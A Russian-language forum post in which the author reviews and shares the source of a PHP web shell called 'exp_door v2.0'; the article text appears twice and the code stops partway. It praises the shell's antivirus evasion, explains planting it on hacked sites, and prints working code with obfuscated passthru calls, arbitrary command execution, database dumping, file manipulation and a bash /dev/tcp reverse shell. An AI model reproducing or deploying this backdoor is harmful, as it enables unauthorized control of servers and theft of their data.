Всем привет!
В начале этого года мною был написан простой вариант шелла с небольшим набором функций. Данный шелл был заточен под невидимость для антивирусов и другого специализированного ПО.
Но вот мне захотелось написать уже вариант имеющий в арсенале файл-менеджер с разными плюшками. Так как писать много раз написанное не всегда интересно, то я поставил себе более сложную задачу – написать такой шелл без единой строчки кода JavaScript. Дело в том, что большинство элементов, которые требуют действия пользователей - разные клики и т.д и т.п, пишутся именно с применением JS. Это разумно, так как у JavaScript имеется огромный арсенал обработки событий, который позволяет значительно облегчить жизнь программисту. А использование фреймворка jquery делает это ещё проще.
Однако здесь кроется подводный камень – требуется подключение jquery, а значит нужно ссылаться на удалённый ресурс с ним. Кроме этого, некоторые пользователи предпочитают отключать JS в браузере, а значит код работать не будет. В общем пришлось изрядно повозиться, чтобы создать web-shell без JavaScript, используя только HTML5 + CSS3 + PHP. Спросите а зачем так мучиться? А я отвечу – люблю сложные задачи ) Мне было интересно это сделать. На написание шелла ушло более месяца, код вырос почти до 700 строк. Несмотря на приличный объём, антивирусы его не палят.
И вот теперь с чувством выполненного долга, представляю обзор нового веб-шелла exp_door v2.0.
Остановлюсь на минутку для того чтобы пояснить, для тех кто не знает, что такое web-shell. Веб-шелл, он же бэкдор - это программа которую заливают на уязвимый ресурс с целью управления этим ресурсом. То есть, допустим вы взломали админку сайта, или получили доступ к БД с возможностью заливки файлов. Далее заливаете шелл, и потом в браузере выполняете произвольный код, а также имеете другие широкие возможности.
Для того чтобы протестировать шелл на локалке, скопируйте код (в конце статьи выложен), и вставьте в php-файл с любым названием. У меня это browser.php например. Файл лучше всего положить в корень сайта, то есть в директорию /var/www/html/ Далее выполните в терминале команду для запуска сервисов MySql и PHP.
Теперь открываете браузер, вводите адрес локального сайта с шеллом -
Креды по-умолчанию: логин – admin, пароль – testpass. Сменить данные для авторизации можно в исходном коде (33 строка). При авторизации данные записываются в куки, и при последующих заходах вводить данные не понадобится.
После успешной авторизации, вы увидите панель веб-шелла. Панель состоит из нескольких частей:
В шапке сразу отображается ряд уже выполненных важных команд автоматически. Вы видите под каким юзером вы находитесь, и к какой группе принадлежите. Также навиду данные об операционной системе сервера – название, релиз. Присутствует местонахождение временной папки и права на неё. Далее мы видим версию PHP, адрес сервера, и что в данном случае, сервер крутится на апаче.
Если вы выходите через VPN, то IP-адрес клиента (ваш), не должен быть реальным, если это не так, значит VPN отвалился. Кроме айпишника показываются языки, которые поддерживаются вашим браузером. Если вы не хотите палить что вы, например, русский, то заход в панель, нужно делать через браузер с поддержкой, например, только английского языка.
Ниже текущая дата сервера, время, и отличие его от GMT. В завершении свободный и общий объём диска, а также текущее местонахождение (директория где находится шелл) и права на неё. С выходом всё понятно – при нажатии на кнопку EXIT, происходит разлогинивание, удаляются куки, и при следующем посещении, необходимо заново будет ввести данные для входа в панель.
Рассмотрим файл-менеджер:
В верхней части мы видим также текущее месторасположение на сервере, которое мы можем сменить разными способами:
1. Ввести путь вручную и нажать Go dir для перехода в соответствующую директорию.
2. Нажать на Up one level для перехода на один уровень выше. Так можно щёлкать до самой корневой папки.
Стрелочка зелёного цвета возвращает в предыдущую директорию, и папка с изображением домика, соответственно в домашнюю папку, коей будет являться директория в которой лежит шелл. В основной части файл-менеджера показываются в отсортированном по-алфавиту порядке сначала папки, потом файлы, и последними симлинки. Папки, а также симлинки, указывающие на папки, выделены зелёным цветом. У папок присутствует значок папки, у файлов значок листка с завёрнутым уголком, и у линка стрелочка.
После названия, в колонке Action, есть ряд действий которые рассмотрим чуть позже. В таблице выводятся права, причём это сделано сразу в двух вариантах – как цифровом, так и в символьном, чтобы проще было ориентироваться. Как говорится, кому как удобнее, кто как привык. Если есть возможность писать в папку, права выделяются зелёным цветом, а если она выделена красным, то нет прав даже на просмотр содержимого, и при попытке открытия получите следующее сообщение:
Далее присутствует юзер и группа, к которым принадлежит файл/папка/линк, дата модификации, и размеры файлов. При нажатии на папку происходит переход в неё, и соответственно уже отображается всё то что в ней находится. При наведении мышки на любую строку происходит подсветка этой строки белым цветом, чтобы проще было ориентироваться. Также, если щёлкнуть мышкой в любом месте строки, то она выделяется зелёным цветом.
При нажатии на файл, происходит его открытие в модальном окне, причём для файлов PHP, я сделал подсветку синтаксиса.
Если файл не удаётся открыть, то увидите соответствующее сообщение:
А если файл пустой, то выведется это окно:
Теперь рассмотрим колонку Action. При наведении мышки каждый пункт подсвечивается, и появляется подсказка.
D – Delete (удалить)
R – Rename (переименовать)
T – Touch (изменить дату модификации)
U – Upload (загрузить в папку)
E – Edit (отредактировать)
Стрелка вниз – Download (скачать)
Нужно отметить, что данные действия вы не всегда сможете выполнить из-за нехватки прав на тот или иной объект. В этом случае, вы получите соответствующее сообщение:
Все вышеописанные действия сработают только при отмеченном чекбоксе, в противном случае, ничего не произойдёт. При выборе соответствующего действия, всё интуитивно понятно, например, отмечаем чекбокс и жмём на стрелку Download – появляется окно, в котором есть возможность сохранить файл.
Подробно каждый пункт рассматривать не будем, там всё просто, и перейдём во вкладку с инструментами, которая появится при нажатии на кнопку Tools.
Здесь отличия от первой версии шелла несущественные – скачивание и загрузка были перенесены в действия, соответственно стало проще – не нужно прописывать пути к файлам. Изменения коснулись дампа базы данных – добавил поле Port. Стандартный порт для базы данных - 3306, и если это так, то порт НЕ обязательно писать, дамп сработает при остальных правильно заполненных полях. Но если порт сменён на нестандартный, тогда разумеется его вписывать нужно.
Также изменил бэкконнект – ранее порт был фиксированный, теперь можно ввести любой через вертикальную черту. Например запустим слушателя на машине с портом 12345.
Так как мы проверяем на локалке, то наш IP-адрес будет 127.0.0.1, и через вертикальную черту пишем порт 12345.
Жмём Reverse, и обратная оболочка готова, можно вводить команды на удалённом компьютере. Для завершения сеанса ввести команду exit.
Остальное осталось в неизменном виде – несколько ходовых вариантов кодирования/декодирования, показ phpinfo, потенциально опасных функций включённых на сервере, и список имеющихся загрузчиков. Ну и конечно самое главное возможность вставлять произвольный код. Например вбив в CMD команду cat /etc/shells мы получим на выходе все присутствующие на сервере оболочки:
Чтобы перейти обратно к файл-менеджеру, нажмите на ссылку Hide tools.
Ну что же друзья, обзор закончен, делюсь исходником. Если вы знаете PHP и HTML, то можете видоизменять код, и добавлять плюшки на своё усмотрение. Учите программирование, и сможете написать себе любой софт )
В начале этого года мною был написан простой вариант шелла с небольшим набором функций. Данный шелл был заточен под невидимость для антивирусов и другого специализированного ПО.
Но вот мне захотелось написать уже вариант имеющий в арсенале файл-менеджер с разными плюшками. Так как писать много раз написанное не всегда интересно, то я поставил себе более сложную задачу – написать такой шелл без единой строчки кода JavaScript. Дело в том, что большинство элементов, которые требуют действия пользователей - разные клики и т.д и т.п, пишутся именно с применением JS. Это разумно, так как у JavaScript имеется огромный арсенал обработки событий, который позволяет значительно облегчить жизнь программисту. А использование фреймворка jquery делает это ещё проще.
Однако здесь кроется подводный камень – требуется подключение jquery, а значит нужно ссылаться на удалённый ресурс с ним. Кроме этого, некоторые пользователи предпочитают отключать JS в браузере, а значит код работать не будет. В общем пришлось изрядно повозиться, чтобы создать web-shell без JavaScript, используя только HTML5 + CSS3 + PHP. Спросите а зачем так мучиться? А я отвечу – люблю сложные задачи ) Мне было интересно это сделать. На написание шелла ушло более месяца, код вырос почти до 700 строк. Несмотря на приличный объём, антивирусы его не палят.
И вот теперь с чувством выполненного долга, представляю обзор нового веб-шелла exp_door v2.0.
Остановлюсь на минутку для того чтобы пояснить, для тех кто не знает, что такое web-shell. Веб-шелл, он же бэкдор - это программа которую заливают на уязвимый ресурс с целью управления этим ресурсом. То есть, допустим вы взломали админку сайта, или получили доступ к БД с возможностью заливки файлов. Далее заливаете шелл, и потом в браузере выполняете произвольный код, а также имеете другие широкие возможности.
Для того чтобы протестировать шелл на локалке, скопируйте код (в конце статьи выложен), и вставьте в php-файл с любым названием. У меня это browser.php например. Файл лучше всего положить в корень сайта, то есть в директорию /var/www/html/ Далее выполните в терминале команду для запуска сервисов MySql и PHP.
Теперь открываете браузер, вводите адрес локального сайта с шеллом -
Ссылка скрыта от гостей
и открывается окно авторизации.Креды по-умолчанию: логин – admin, пароль – testpass. Сменить данные для авторизации можно в исходном коде (33 строка). При авторизации данные записываются в куки, и при последующих заходах вводить данные не понадобится.
После успешной авторизации, вы увидите панель веб-шелла. Панель состоит из нескольких частей:
В шапке сразу отображается ряд уже выполненных важных команд автоматически. Вы видите под каким юзером вы находитесь, и к какой группе принадлежите. Также навиду данные об операционной системе сервера – название, релиз. Присутствует местонахождение временной папки и права на неё. Далее мы видим версию PHP, адрес сервера, и что в данном случае, сервер крутится на апаче.
Если вы выходите через VPN, то IP-адрес клиента (ваш), не должен быть реальным, если это не так, значит VPN отвалился. Кроме айпишника показываются языки, которые поддерживаются вашим браузером. Если вы не хотите палить что вы, например, русский, то заход в панель, нужно делать через браузер с поддержкой, например, только английского языка.
Ниже текущая дата сервера, время, и отличие его от GMT. В завершении свободный и общий объём диска, а также текущее местонахождение (директория где находится шелл) и права на неё. С выходом всё понятно – при нажатии на кнопку EXIT, происходит разлогинивание, удаляются куки, и при следующем посещении, необходимо заново будет ввести данные для входа в панель.
Рассмотрим файл-менеджер:
В верхней части мы видим также текущее месторасположение на сервере, которое мы можем сменить разными способами:
1. Ввести путь вручную и нажать Go dir для перехода в соответствующую директорию.
2. Нажать на Up one level для перехода на один уровень выше. Так можно щёлкать до самой корневой папки.
Стрелочка зелёного цвета возвращает в предыдущую директорию, и папка с изображением домика, соответственно в домашнюю папку, коей будет являться директория в которой лежит шелл. В основной части файл-менеджера показываются в отсортированном по-алфавиту порядке сначала папки, потом файлы, и последними симлинки. Папки, а также симлинки, указывающие на папки, выделены зелёным цветом. У папок присутствует значок папки, у файлов значок листка с завёрнутым уголком, и у линка стрелочка.
После названия, в колонке Action, есть ряд действий которые рассмотрим чуть позже. В таблице выводятся права, причём это сделано сразу в двух вариантах – как цифровом, так и в символьном, чтобы проще было ориентироваться. Как говорится, кому как удобнее, кто как привык. Если есть возможность писать в папку, права выделяются зелёным цветом, а если она выделена красным, то нет прав даже на просмотр содержимого, и при попытке открытия получите следующее сообщение:
Далее присутствует юзер и группа, к которым принадлежит файл/папка/линк, дата модификации, и размеры файлов. При нажатии на папку происходит переход в неё, и соответственно уже отображается всё то что в ней находится. При наведении мышки на любую строку происходит подсветка этой строки белым цветом, чтобы проще было ориентироваться. Также, если щёлкнуть мышкой в любом месте строки, то она выделяется зелёным цветом.
При нажатии на файл, происходит его открытие в модальном окне, причём для файлов PHP, я сделал подсветку синтаксиса.
Если файл не удаётся открыть, то увидите соответствующее сообщение:
А если файл пустой, то выведется это окно:
Теперь рассмотрим колонку Action. При наведении мышки каждый пункт подсвечивается, и появляется подсказка.
D – Delete (удалить)
R – Rename (переименовать)
T – Touch (изменить дату модификации)
U – Upload (загрузить в папку)
E – Edit (отредактировать)
Стрелка вниз – Download (скачать)
Нужно отметить, что данные действия вы не всегда сможете выполнить из-за нехватки прав на тот или иной объект. В этом случае, вы получите соответствующее сообщение:
Все вышеописанные действия сработают только при отмеченном чекбоксе, в противном случае, ничего не произойдёт. При выборе соответствующего действия, всё интуитивно понятно, например, отмечаем чекбокс и жмём на стрелку Download – появляется окно, в котором есть возможность сохранить файл.
Подробно каждый пункт рассматривать не будем, там всё просто, и перейдём во вкладку с инструментами, которая появится при нажатии на кнопку Tools.
Здесь отличия от первой версии шелла несущественные – скачивание и загрузка были перенесены в действия, соответственно стало проще – не нужно прописывать пути к файлам. Изменения коснулись дампа базы данных – добавил поле Port. Стандартный порт для базы данных - 3306, и если это так, то порт НЕ обязательно писать, дамп сработает при остальных правильно заполненных полях. Но если порт сменён на нестандартный, тогда разумеется его вписывать нужно.
Также изменил бэкконнект – ранее порт был фиксированный, теперь можно ввести любой через вертикальную черту. Например запустим слушателя на машине с портом 12345.
Так как мы проверяем на локалке, то наш IP-адрес будет 127.0.0.1, и через вертикальную черту пишем порт 12345.
Жмём Reverse, и обратная оболочка готова, можно вводить команды на удалённом компьютере. Для завершения сеанса ввести команду exit.
Остальное осталось в неизменном виде – несколько ходовых вариантов кодирования/декодирования, показ phpinfo, потенциально опасных функций включённых на сервере, и список имеющихся загрузчиков. Ну и конечно самое главное возможность вставлять произвольный код. Например вбив в CMD команду cat /etc/shells мы получим на выходе все присутствующие на сервере оболочки:
Чтобы перейти обратно к файл-менеджеру, нажмите на ссылку Hide tools.
Ну что же друзья, обзор закончен, делюсь исходником. Если вы знаете PHP и HTML, то можете видоизменять код, и добавлять плюшки на своё усмотрение. Учите программирование, и сможете написать себе любой софт )
PHP:
<?php
if (isset($_POST['load']) && !empty($_POST['choose'])) {
$file = $_POST['choose'][0];
if (is_readable($file)) {
if (file_exists($file)) {
if (ob_get_level()) {
ob_end_clean();
}
header('Content-Description: File Transfer');
header('Content-Type: application/octet-stream');
header('Content-Disposition: attachment; filename=' . basename($file));
header('Content-Transfer-Encoding: binary');
header('Expires: 0');
header('Cache-Control: must-revalidate');
header('Pragma: public');
header('Content-Length: ' . filesize($file));
readfile($file);
exit;
}
}
}
function showForm() {
$string = "<form action='" . $_SERVER["SCRIPT_NAME"] . "' method='post'>";
$string.= "<label>Login:</label>" . '<br>';
$string.= "<input type='text' name='login'>" . '<br>';
$string.= "<label>Passwd: </label>" . '<br>';
$string.= "<input type='password' name='pass'>" . '<br>' . '<br>';
$string.= "<input type='submit' name='log' value='Sign up'>";
$string.= "</form>";
return $string;
}
function check($login, $pass) {
if (($login == "admin") && ($pass == "179ad45c6ce2cb97cf1029e212046e81")) return true; //testpass
else return false;
}
if (isset($_POST['log'])) {
$login = $_POST['login'];
$pass = md5($_POST['pass']);
if (check($login, $pass)) {
setcookie("login", $login);
setcookie("pass", $pass);
header("Refresh:0"); // или header("Location: http://".$_SERVER['HTTP_HOST'].$_SERVER['REQUEST_URI']);
} else echo "Access denied!";
}
if (isset($_POST['exit'])) {
setcookie("login", $login, time() - 3600, '/');
setcookie("pass", $pass, time() - 3600, '/');
header("Refresh:0");
}
?>
<!DOCTYPE html>
<html>
<head>
<title>exp_door v2.0</title>
<link href="" rel="icon" type="image/png" />
<meta charset="utf-8">
<style type="text/css">
html{background: #F1F3F5;}
body{margin: 0;background: #F1F3F5;}
pre {margin: 0;}
img{vertical-align: middle;}
.ya{width: 178px!important;box-shadow: none;border-collapse: separate;}
.col{width: 0;white-space: nowrap;padding-right: 50px;}
.all{font-family: Arial, Helvetica, sans-serif;font-weight:bold; font-size : 12px;}
a, a:visited{color: #1d5405;text-decoration:none;}
#main {margin: auto;background: #F1F3F5;min-height: 100vh;}
#tab{background: #E9ECEF;padding-left:1px;border: 1px solid #cccccc;margin: 5px}
#result{background: #E9ECEF;padding:5px;border: 1px solid #cccccc;margin: 5px;min-height: 68vh;}
#firsttab{width:100%;border-collapse:collapse;}
.hat{padding-right:5px;padding-left:5px;font-weight: normal;}
.block-hide {margin: 0 auto;padding:5px;}
.to-be-changed{position: absolute;z-index:10;width: calc(100% - 10px);background: #F1F3F5;}
.to-be-changed:target{display: none;}
.open{display: block;font-weight: 400;margin: 0 5px 5px 5px;position: absolute;z-index:1;width: calc(100% - 20px);}
.hat form{color: red;font-size:16px;text-align: center;width: 200px;left: calc(50% - 100px);top: 2%;position: absolute;}
.openf{border: none;background: #E9ECEF00;cursor: pointer}
.demos{
margin-left: 5px;
padding: 4px;
text-align: center;
background: #0d0d0d1a;
border: 1px solid #cccccc;
font-weight: bold;
width: 64px;
border-radius: 3px;
}
.demolink{background-color: #f8f4f400!important;color: #1d5405!important;}
.cbox{width:18px}
table.to td {
overflow:hidden;
}
table.to td:nth-of-type(1) {
width:auto;
}
table.to td:nth-of-type(2) {
width:50px;
}
table.to td:nth-of-type(3) {
width:auto;
}
tr.note:hover {background: #f5f5f5;}
tr.note:focus {background-color: #8FBC8F;outline: 1px solid grey;}
.modalbackground {
margin: 0; /* убираем отступы */
padding: 0; /* убираем отступы */
position: fixed; /* фиксируем положение */
top:0; /* растягиваем блок по всему экрану */
bottom:0;
left:0;
right:0;
background: rgba(0,0,0,0.5); /* полупрозрачный цвет фона */
z-index:100; /* выводим фон поверх всех слоев на странице браузера */
opacity:0; /* Делаем невидимым */
pointer-events: none; /* элемент невидим для событий мыши */
}
/* при отображении модального окно - именно здесь начинается магия */
.modalbackground:target {
opacity: 1; /* делаем окно видимым */
pointer-events: auto; /* элемент видим для событий мыши */
text-align: center
}
/* ширина диалогового окна и его отступы от экрана */
.modalwindow {
display: inline-block;
margin: 10% auto;
padding: 1%;
background: #fff;
border-radius: 3px;
font-size: 16px;
}
.modalwindow2 {
display: inline-block;
margin: 2% auto;
padding: 1%;
background: #fff;
border-radius: 3px;
font-size: 16px;
height: 80%;
width: 90%;
}
/* оформление сообщение */
.modalwindow p {
padding: 0;
margin: 4% 0 8% 0;
text-align: center;
}
.modalwindow2 p {
padding: 0;
margin: 4% 0 4% 0;
text-align: center;
}
/* вид кнопки ЗАКРЫТЬ */
.modalwindow a {
display: block;
color: #fff;
background: #369;
padding: 1%;
margin: 0 auto;
width: 50%;
border-radius: 3px;
text-align: center;
text-decoration: none;
}
.modalwindow2 a {
display: block;
color: #fff;
background: #369;
padding: 6px;
margin: 0 auto;
width: 120px;
border-radius: 3px;
text-align: center;
text-decoration: none;
}
/* вид кнопки ЗАКРЫТЬ при наведении на нее мыши */
.modalwindow a:hover {
background: #47a;
}
#inner1{float:right;}
#inner2{float:right;clear: right;}
hr {border:1px !important;height: 1px;background-color:#ccc;width: 100% !important;}
.hide{font-size: 14px; margin-right: 20px;background-color:#F1F3F5!important;color: #1d5405!important;margin-left: 1px;font-weight: bold;text-decoration: underline!important;}
.new{font-size: 14px;font-weight: 400;width: 100%;}
.center{font-size: 16px;font-weight: 400;}
.error{text-align:center;font-size:24px;color:red;display:block;margin:0 auto;}
.a_size{font-size:18px;}
td:not(:first-child){padding-left: 8px;} /*Аналогично кроме первого nth-child(n+2)*/
.area{width: 96%;height: 85%;border: 1px solid #cccccc;margin: 10px auto;overflow-y: auto;word-wrap: break-word;text-align: left;font-weight: normal;font-size: 12px}
.bt{color:#008800;}
.pm{font-weight: 700;font-size: 14px;color:red}
</style>
</head>
<body>
<?php
ini_set('display_errors', 0);
ini_set('display_startup_errors', 0);
error_reporting(0);
function printPerms($file) {
$mode = fileperms($file);
if ($mode & 0x1000) {
$type = 'p';
} else if ($mode & 0x2000) {
$type = 'c';
} else if ($mode & 0x4000) {
$type = 'd';
} else if ($mode & 0x6000) {
$type = 'b';
} else if ($mode & 0x8000) {
$type = '-';
} else if ($mode & 0xA000) {
$type = 'l';
} else if ($mode & 0xC000) {
$type = 's';
} else $type = 'u';
$owner["read"] = ($mode & 00400) ? 'r' : '-';
$owner["write"] = ($mode & 00200) ? 'w' : '-';
$owner["execute"] = ($mode & 00100) ? 'x' : '-';
$group["read"] = ($mode & 00040) ? 'r' : '-';
$group["write"] = ($mode & 00020) ? 'w' : '-';
$group["execute"] = ($mode & 00010) ? 'x' : '-';
$world["read"] = ($mode & 00004) ? 'r' : '-';
$world["write"] = ($mode & 00002) ? 'w' : '-';
$world["execute"] = ($mode & 00001) ? 'x' : '-';
if ($mode & 0x800) $owner["execute"] = ($owner['execute'] == 'x') ? 's' : 'S';
if ($mode & 0x400) $group["execute"] = ($group['execute'] == 'x') ? 's' : 'S';
if ($mode & 0x200) $world["execute"] = ($world['execute'] == 'x') ? 't' : 'T';
$s = sprintf("%1s", $type);
$s.= sprintf("%1s%1s%1s", $owner['read'], $owner['write'], $owner['execute']);
$s.= sprintf("%1s%1s%1s", $group['read'], $group['write'], $group['execute']);
$s.= sprintf("%1s%1s%1s", $world['read'], $world['write'], $world['execute']);
if (strpos($s, '---', -3)) {
return '<font color="#FF0000"><b>' . $s . '</b></font>';
} elseif (strpos($s, 'rw', -3)) {
return '<font color="#008000"><b>' . $s . '</b></font>';
} else {
return '<font color="#000000"><b>' . $s . '</b></font>';
}
}
function numPerms($file) {
$numperm = substr(sprintf('%o', fileperms($file)), -4);
if ((int)(substr($numperm, 0, 1)) > 1) {
return '<font color="#FF8C00"><b>' . $numperm . '</b></font>';
} else {
return '<font color="#000000"><b>' . $numperm . '</b></font>';
}
}
$home = '
<div class="all" id="main">
<div class="block-hide">
<div class="hat">
<div>
<div id="inner1"><img src="" /></div>
<div id="inner2"><p style="float:right;margin-block-end:3px;font-size:10px">exp_door v2.0</p></div>
</div>';
echo $home;
if (isset($_POST['submitBtn'])) {
$actpath = isset($_POST['path']) ? $_POST['path'] : __DIR__;
chdir($actpath);
} else {
$actpath = isset($_GET['path']) ? $_GET['path'] : __DIR__;
chdir($actpath);
}
$login = $_COOKIE['login'];
$pass = $_COOKIE['pass'];
if (check($login, $pass)) {
$a1 = 'pas' . 'sth' . 'ru';
$cwd = $_GET['path'];
if (empty($cwd)) {
$cwd = getcwd();
}
$uname = php_uname();
$php = phpversion();
$temp_file = sys_get_temp_dir();
$df = disk_free_space("/");
$dt = disk_total_space("/");
$freeSpace = $df / 1048576;
$freeUnit = 'Mb';
if ($freeSpace >= 1024) {
$freeSpace/= 1024;
$freeUnit = 'Gb';
}
$totalSpace = $dt / 1048576;
$totalUnit = 'Mb';
if ($totalSpace >= 1024) {
$totalSpace/= 1024;
$totalUnit = 'Gb';
}
$freePer = round($df / $dt * 100.0, 2);
if ($freePer > 100) $freePer = 100;
echo '<pre>';
echo 'id | ';
echo $a1("id");
echo 'uname | ' . $uname . '<br>';
echo 'tmp | ' . $temp_file . ' ' . substr(sprintf('%o', fileperms($temp_file)), -4) . '<br>';
echo 'php | ' . $php . '<br>';
echo 'server| ' . $_SERVER['SERVER_NAME'] . ' ' . $_SERVER["SERVER_ADDR"] . ' ' . $_SERVER['SERVER_SOFTWARE'] . '<br>';
echo 'client| ' . $_SERVER["REMOTE_ADDR"] . ' ' . $_SERVER[HTTP_ACCEPT_LANGUAGE] . '<br>';
echo 'date | ' . date("Y-m-d-H:i:s e P") . ' GMT' . '<br>';
echo 'HDD | ' . "Total: " . round($totalSpace, 2) . " " . $totalUnit . " ";
echo "Free: " . round($freeSpace, 2) . " " . $freeUnit . "(" . $freePer . "%)" . '<br>';
echo 'cwd | ' . $cwd . ' ' . "[" . numPerms($actpath) . "] " . printPerms($actpath) . '<hr>';
echo '</pre>';
echo '</div>';
function showContent($path) {
if ($handle = opendir($path)) {
$up = substr($path, 0, (strrpos(dirname($path . "/."), "/")));
if ($up == NULL) {
$up = "/";
}
$HTML = '
<div class="new">
<label class="demos" style="display:inline-block"><a class="demolink" href="#tools">Tools</a></label> </td>
<form style="display:inline;float:right" method="POST">
<input style="margin-right: 5px;" type="submit" name="exit" value="EXIT"/>
</form>
</div>
<div class="open">
<div>
<hr>
<form action="" style="display:inline" method="POST">
<a class="hide" href="">Hide tools</a>
<input type="submit" name="info" value="phpinfo"/>
<input type="submit" name="down" value="downloaders"/>
<input type="submit" name="fun" value="functions"/>
</form>
<form style="display:inline" method="POST">
<input type="text" name="cmd" placeholder="CMD">
</form>
<hr>
<div style="float:left;margin-right:12px;">
<form method="POST">
<input style="width:178px" type="text" name="name" placeholder="DB name" required><br/>
<input style="width:178px" type="text" name="user" placeholder="DB user" required><br/>
<input style="width:178px" type="password" name="pass" placeholder="DB pass" required><br/>
<input style="width:178px" type="text" name="host" placeholder="MySQL host" required><br/>
<input style="width:178px" type="text" name="port" placeholder="Port"><br/>
<button style="width:196px" type="submit" name="DB">Save DB to file.sql</button><br/><br/><br/>
</form>
</div>
<div style="float: left;display:block;width:208px">
<pre>
<form method="POST">
<label><b class="bt">Base64 encode/decode:</b></label>
<input style="width:178px" type="text" name="base64">
<table class="ya">
<tr>
<td style="padding: 0;border: none"><input style="margin-left: -1px;width: 96px;" type="submit" name="submit" value="Encode"></td>
<td style="padding: 0;border: none"><input style="margin-right: 8px;width: 96px;" type="submit" name="submit2" value="Decode"></td>
</tr>
</table>
</form>
</pre>
</div>
<div style="float: left;display:block;width:208px">
<pre>
<form method="POST">
<label><b class="bt">URL encode/decode:</b></label>
<input style="width:178px" type="text" name="url">
<table class="ya">
<tr>
<td style="padding: 0;border: none"><input style="margin-left: -1px;width: 96px;" type="submit" name="submit_u" value="Encode"></td>
<td style="padding: 0;border: none"><input style="margin-right: 8px;width: 96px;" type="submit" name="submit_u2" value="Decode"></td>
</tr>
</table>
</form>
</pre>
</div>
<div style="float: left;display:block;width:208px">
<pre>
<form method="POST">
<label><b class="bt">HEX encode/decode:</b></label>
<input style="width:178px" type="text" name="hex">
<table class="ya">
<tr>
<td style="padding: 0;border: none"><input style="margin-left: -1px;width: 96px;" type="submit" name="submit_hex" value="Encode"></td>
<td style="padding: 0;border: none"><input style="margin-right: 8px;width: 96px;" type="submit" name="submit_hex2" value="Decode"></td>
</tr>
</table>
</form>
</pre>
</div>
<div style="float: left;display:block;width:208px">
<pre>
<form method="POST">
<label><b class="bt">BackConnect:</b></label>
<input style="width:178px" type="text" name="host_" placeholder="Enter host|port" required>
<table class="ya">
<tr>
<td style="padding: 0;border: none"><input style="margin-left: -1px;width: 96px;" type="submit" name="reverse" value="Reverse"></td>
</tr>
</table>
</form>
</pre>
</div>
<hr style="clear:both">
</div>';
echo $HTML;
$a1 = 'pas' . 'sth' . 'ru';
$b2 = 'ex' . 'ec';
$down = "which get;which wget;which lynx;which curl;which fetch;which links;";
$aTwo = "ba" . "se" . "6" . "4" . "_" . "en" . "co" . "de";
$bTwo = "ba" . "se" . "6" . "4" . "_" . "de" . "co" . "de";
$fun = $bTwo("cGhwIC1yICdwcmludF9yKGdldF9kZWZpbmVkX2Z1bmN0aW9ucygpKTsnIHwgZ3JlcCAtRSAnIChzeXN0ZW18ZXhlY3xzaGVsbF9leGVjfHBhc3N0aHJ1fHByb2Nfb3Blbnxwb3BlbnxjdXJsX2V4ZWN8Y3VybF9tdWx0aV9leGVjfHBhcnNlX2luaV9maWxlfHNob3dfc291cmNlKSc");
if (isset($_POST['cmd'])) {
echo '<pre>';
$a1($_POST['cmd']);
echo '</pre>';
}
if (isset($_POST['info'])) {
echo phpinfo();
}
if (isset($_POST['down'])) {
echo '<textarea cols=37 rows=7 style="padding: 5px;resize: none;">';
$a1($down);
echo '</textarea>';
}
if (isset($_POST['fun'])) {
echo '<pre>';
$a1($fun);
echo '</pre>';
}
if (isset($_POST['DB'])) {
$host = $_POST['host'];
$user = $_POST['user'];
$pass = $_POST['pass'];
$name = $_POST['name'];
$port = $_POST['port'];
$link = new mysqli($host, $user, $pass, $name, $port);
if ($link->connect_error) {
die("<b class='pm'>Database access is not available:</b><br>" . $link->connect_error);
exit();
} else {
$b2('mysqldump --port=' . $port . ' --user=' . $user . ' --password=' . $pass . ' --host=' . $host . ' ' . $name . ' > file.sql');
echo '<b class="bt" style="font-size: 14px">Dump completed!</b>';
}
}
if (isset($_POST['submit'])) {
$base64 = $_POST['base64'];
$encode = $aTwo($base64);
echo '<p class="pm">' . "Encode base64: " . '</p>' . $encode;
}
if (isset($_POST['submit2'])) {
$base64_d = $_POST['base64'];
$decode = $bTwo($base64_d);
echo '<p class="pm">' . "Decode base64: " . '</p>' . htmlentities($decode);
}
if (isset($_POST['submit_u'])) {
$url = $_POST['url'];
$encode_u = urlencode($url);
echo '<p class="pm">' . "Encode url: " . '</p>' . $encode_u;
}
if (isset($_POST['submit_u2'])) {
$url_d = $_POST['url'];
$decode_u = urldecode($url_d);
echo '<p class="pm">' . "Decode url: " . '</p>' . htmlentities($decode_u);
}
if (isset($_POST['submit_hex'])) {
$h = $_POST['hex'];
$encode_hex = "0x" . bin2hex($h);
echo '<p class="pm">' . "Encode HEX: " . '</p>' . $encode_hex;
}
if (isset($_POST['submit_hex2'])) {
$h2 = $_POST['hex'];
$decode_hex = hex2bin(substr($h2, 2));
echo '<p class="pm">' . "Decode HEX: " . '</p>' . htmlentities($decode_hex);
}
if (isset($_POST['reverse'])) {
$back = explode("|", $_POST['host_']);
$a1("bash -c 'bash -i &> /dev/tcp/$back[0]/$back[1] 0>&1'");
}
$HTML2 = '</div>
<div id="tools" class="to-be-changed">
<form class="all" id ="tab" action="' . $_SERVER['PHP_SELF'] . '" method="post" name="path">
<table class="to">
<tr>
<td><a href="' . $_SERVER['PHP_SELF'] . '?path=' . __DIR__ . '"><img src="" title="Home"/></a></td>
' . "<td class='col'>▲ <a href='" . $_SERVER['PHP_SELF'] . "?path=$up'>Up one level</a></td>" . '
<td><a href="' . $_SERVER['HTTP_REFERER'] . '"><img src="" title="Go back"/></a></td>
<td>Path: <input style="border: 1px solid #cccccc;width: 250px;" name="path" type="text" value="' . getcwd() . '" />
<input style="border: 1px solid #cccccc;" type="submit" name="submitBtn" value="Go dir" />
</td>
</tr>
</table>
</form>';
echo $HTML2 . "<div class='all' id='result'><form method='post' action='#openModal'><table id='firsttab'>";
echo "<tr style = 'background-color: #73afe4;color: #0E175D;height: 24px;'><td></td>" . "<td>" . "Name" . "</td>" . "<td>" . "Action" . "</td>" . "<td>" . "Permissions" . "</td>" . "<td>" . "Owner/Group" . "</td>" . "<td>" . "Modify" . "</td>" . "<td>" . "Size" . "</td></tr>";
$alldir = array();
$allfile = array();
$alllink = array();
while (false !== ($file = readdir($handle))) {
if (is_link($path . '/' . $file)) {
array_push($alllink, $file);
} elseif (is_file($path . '/' . $file)) {
array_push($allfile, $file);
} elseif (is_dir($path . '/' . $file)) {
array_push($alldir, $file);
}
}
closedir($handle);
} else {
echo '<div><span class="error">Can\'t open folder!<br><br><a class="a_size" href="' . $_SERVER['HTTP_REFERER'] . '">--> Go back <--</a></span></div>';
}
sort($alldir);
sort($allfile);
sort($alllink);
$allfiles = array_merge($alldir, $allfile, $alllink);
foreach ($allfiles as $file) {
if ($file != "." && $file != "..") {
$fName = $file;
